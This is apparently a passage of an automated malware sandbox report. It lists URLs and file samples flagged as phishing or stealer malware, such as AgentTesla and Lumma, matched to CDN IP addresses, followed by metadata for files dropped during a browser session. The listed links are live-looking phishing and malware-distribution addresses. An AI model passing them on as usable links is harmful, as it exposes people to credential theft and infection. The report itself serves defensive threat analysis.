                                                                                                                  https://sites.google.com/kula.ai/rdps/homeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 151.101.66.137
                                                                                                                  https://sites.google.com/kula.ai/rdps/homeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 151.101.2.137
                                                                                                                  cdnjs.cloudflare.comhttps://init-area.fr/ABGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.euGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.17.24.14
                                                                                                                  https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.24.14
                                                                                                                  https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.24.14
                                                                                                                  doc55334.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.17.24.14
                                                                                                                  vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.24.14
                                                                                                                  https://fm.blebsions.com/R7tS/Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.24.14
                                                                                                                  Payment_Failure_Notice_Office365_sdf_[13019].htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  https://vCyA.warmickmak.ru/PrEvJj/Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.24.14
                                                                                                                  https://usemployee-hrdbenefits.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.24.14
                                                                                                                  challenges.cloudflare.comhttps://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.18.95.41
                                                                                                                  https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.18.95.41
                                                                                                                  vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.18.94.41
                                                                                                                  https://fm.blebsions.com/R7tS/Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.18.95.41
                                                                                                                  https://vCyA.warmickmak.ru/PrEvJj/Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.18.94.41
                                                                                                                  https://52kz793.afratradingagency.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.18.95.41
                                                                                                                  https://usemployee-hrdbenefits.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.18.94.41
                                                                                                                  A file has been sent to you via DROPBOX.pdfGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.18.95.41
                                                                                                                  DocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.18.94.41
                                                                                                                  http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.18.94.41
                                                                                                                  sni1gl.wpc.omegacdn.nethttps://forms.office.com/Pages/ShareFormPage.aspx?id=z5Knz2h3QUOIV4F1TCr6H8l1dBxA_RZAr7lBOGCmz8VURUlLQURGTlFGTEQ0QzdESlFMT1lGUlpRWi4u&sharetoken=rKEHIuU7H8od3T6m0C0ZGet hashmaliciousUnknownBrowse
                                                                                                                  • 152.199.21.175
                                                                                                                  doc55334.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 152.199.21.175
                                                                                                                  Payment_Failure_Notice_Office365_sdf_[13019].htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 152.199.21.175
                                                                                                                  https://forms.office.com/Pages/ShareFormPage.aspx?id=z5Knz2h3QUOIV4F1TCr6H8l1dBxA_RZAr7lBOGCmz8VURUlLQURGTlFGTEQ0QzdESlFMT1lGUlpRWi4u&sharetoken=rKEHIuU7H8od3T6m0C0ZGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 152.199.21.175
                                                                                                                  https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharingGet hashmaliciousUnknownBrowse
                                                                                                                  • 152.199.21.175
                                                                                                                  http://office.yacivt.com/wriEcFSZGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 152.199.21.175
                                                                                                                  https://1drv.ms/w/c/17cc1e7b64547fa0/ER4uyAUCto9GkfZ_Sw-4_NAB9TeJj_jWV9oRzb3kdQINFQ?e=4%3aaVtPRh&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                                                                                                                  • 152.199.21.175
                                                                                                                  Payment_Failure_Notice_Office365_sdf_[53487].htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 152.199.21.175
                                                                                                                  https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29tGet hashmaliciousUnknownBrowse
                                                                                                                  • 152.199.21.175
                                                                                                                  https://t.co/4MnukUbNZXGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 152.199.21.175
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  CLOUDFLARENETUShttps://init-area.fr/ABGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  https://registry.paratext.orgGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.6.135
                                                                                                                  DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  4089137200.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                  • 104.21.67.152
                                                                                                                  HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 172.67.177.134
                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                  • 172.67.179.109
                                                                                                                  CROC000400 .pdfGet hashmaliciousUnknownBrowse
                                                                                                                  • 162.247.243.29
                                                                                                                  contract_signed.pdfGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.16.1
                                                                                                                  https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.euGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  CLOUDFLARENETUShttps://init-area.fr/ABGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  https://registry.paratext.orgGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.6.135
                                                                                                                  DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  4089137200.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                  • 104.21.67.152
                                                                                                                  HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 172.67.177.134
                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                  • 172.67.179.109
                                                                                                                  CROC000400 .pdfGet hashmaliciousUnknownBrowse
                                                                                                                  • 162.247.243.29
                                                                                                                  contract_signed.pdfGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.16.1
                                                                                                                  https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.euGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  CLOUDFLARENETUShttps://init-area.fr/ABGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  https://registry.paratext.orgGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.6.135
                                                                                                                  DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  4089137200.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                  • 104.21.67.152
                                                                                                                  HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 172.67.177.134
                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                  • 172.67.179.109
                                                                                                                  CROC000400 .pdfGet hashmaliciousUnknownBrowse
                                                                                                                  • 162.247.243.29
                                                                                                                  contract_signed.pdfGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.16.1
                                                                                                                  https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.euGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  No context
                                                                                                                  No context
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 09:42:45 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2673
                                                                                                                  Entropy (8bit):3.97954591325123
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:8SPdZTB5ZHfidAKZdA1FehwiZUklqehr1ny+3:8SXnXS5y
                                                                                                                  MD5:48CFED9A2EFA22AAF0A5335A03E94395
                                                                                                                  SHA1:B6B14368C75857C5DAA32654580B1CE288F2D3F6
                                                                                                                  SHA-256:C3A5A106F31148A21F02772B62276AF9E27578EBED89E23ABB182833A63623F7
                                                                                                                  SHA-512:B3B9822C4012D8D2ECEA0400E89BC6F6096A1AEAAAD4ABAAA0E1C2320E6EC76F9E47F8D71E118A0EC5AD18D28208A390B76F2B788495E39A74E47F30BD35819C
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:L..................F.@.. ...$+.,.....LN..R..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YHU....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YUU....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YUU....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YUU..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.YWU...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............._e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 09:42:45 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2675
                                                                                                                  Entropy (8bit):3.9951095247048554
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:8ldZTB5ZHfidAKZdA1seh/iZUkAQkqehC1ny+2:8Rnh9Ql5y
                                                                                                                  MD5:1CABA5E8094B4CCA4C18233BB684DAC7
                                                                                                                  SHA1:CD4C8DC8F406ED231E959C4F90CB7357478A9FB3
                                                                                                                  SHA-256:BCC3AB28B4126AD19C27C00132AA52CA5D035E7BACDC898C32E6F0F4B9E947EF
                                                                                                                  SHA-512:699250377F8AE941ADB92B4128A3C6417A7681F2C3B2BA249F7B7AFE23A1202C0DF6A5224AE4F4EC5D35C480F25B59BD8221A87A29261A68CB15D5F8B9673BA6
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:L..................F.@.. ...$+.,......1..R..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YHU....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YUU....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YUU....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YUU..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.YWU...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............._e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2689
                                                                                                                  Entropy (8bit):4.00465159558384
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:8bdZTB5AHfidAKZdA14meh7sFiZUkmgqeh7sc1ny+BX:8znOnW5y
                                                                                                                  MD5:6A06799BB1FC300FB560E9D81B436D39
                                                                                                                  SHA1:EC3D25377139A1BCA28E0E9D2943AB01B9FF6BCF
                                                                                                                  SHA-256:55AEF57D77ACC7876CDC2CD584A118CBAB386EAB8D35644161D02233696689AA
                                                                                                                  SHA-512:6DCB77BE48F050FB41AABD8137FEFC4C208D53DB63796D1A5D2D4D6B27744A9D8880282FE353681C521226B640A1C1399716CC2009B3C6B9F9DD7B439344799B
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YHU....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YUU....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YUU....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YUU..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............._e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 09:42:45 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2677
                                                                                                                  Entropy (8bit):3.995655682346737
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:8adZTB5ZHfidAKZdA1TehDiZUkwqeh+1ny+R:8snSE5y
                                                                                                                  MD5:1FADC96C80A6A4DC75153E83A3475188
                                                                                                                  SHA1:6BD4A92E9FE2D175182C31FC4BEF9BF6494759DD
                                                                                                                  SHA-256:848AA0A922D8D3695FAE6EAE7950FFF16559DD9E463C709996C9508BF4F6109F
                                                                                                                  SHA-512:9C99B07FCC3039A247ECC8B19F531442839E6A2C1364850AA287D8F97178EC0B2D44ADD1217ACBA59DD77295AC46130E85CAD5292536E53B8AE3375E2A45E13E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:L..................F.@.. ...$+.,.....#*..R..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YHU....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YUU....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YUU....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YUU..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.YWU...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............._e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 09:42:45 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2677
                                                                                                                  Entropy (8bit):3.9821928823198953
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:8CdZTB5ZHfidAKZdA1dehBiZUk1W1qehw1ny+C:8UnC9Q5y
                                                                                                                  MD5:7A1A252F7E4AEAD8D8103AA23EFECB35
                                                                                                                  SHA1:34F05B3111A48D14C29D6A86C598159475255D30
                                                                                                                  SHA-256:ACFEB3C97DE8250D12B8830F86BC48B8C4E4A15B9620A34C2DBA0F473AE2271D
                                                                                                                  SHA-512:E92EBFE0F794BD3DCC44E5A81B6ADB18AC38ED44A2A7D02AC72B799256156948A681484BE1CFD0B1A9A718479EE42D70820BF866595EF86A175DE6B865507968
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:L..................F.@.. ...$+.,....H.;..R..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YHU....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YUU....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YUU....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YUU..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.YWU...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............._e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 09:42:45 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2679
                                                                                                                  Entropy (8bit):3.9924359039460273
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:8FdZTB5ZHfidAKZdA1duTeehOuTbbiZUk5OjqehOuTbW1ny+yT+:8xnYTfTbxWOvTbW5y7T
                                                                                                                  MD5:D2E65CC732C3D04F66C0E9BC9D1B41EB
                                                                                                                  SHA1:A3B413DA84BF7DD1B329F49A29E8BA7D13D59F24
                                                                                                                  SHA-256:17A1466CB6F3A27F0C61CC06C09968D37AAB497DE57E03D8598C3B716CF1CB7C
                                                                                                                  SHA-512:39A63DD3BE8072F4EC705C8CB0E2743D387C6F2939E641182956745E0A93502E18EBE0D33AC83084FF002509CAFC44653F429E7C03A4896C5363DF19CA86C6E4
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:L..................F.@.. ...$+.,.........R..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YHU....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YUU....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YUU....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YUU..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.YWU...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............._e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):48316
                                                                                                                  Entropy (8bit):5.6346993394709
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                  Malicious:false
                                                                                                                  Reputation:high, very likely benign file
                                                                                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (65447)
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):89501
                                                                                                                  Entropy (8bit):5.289893677458563
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                  Malicious:false
                                                                                                                  URL:https://code.jquery.com/jquery-3.6.0.min.js
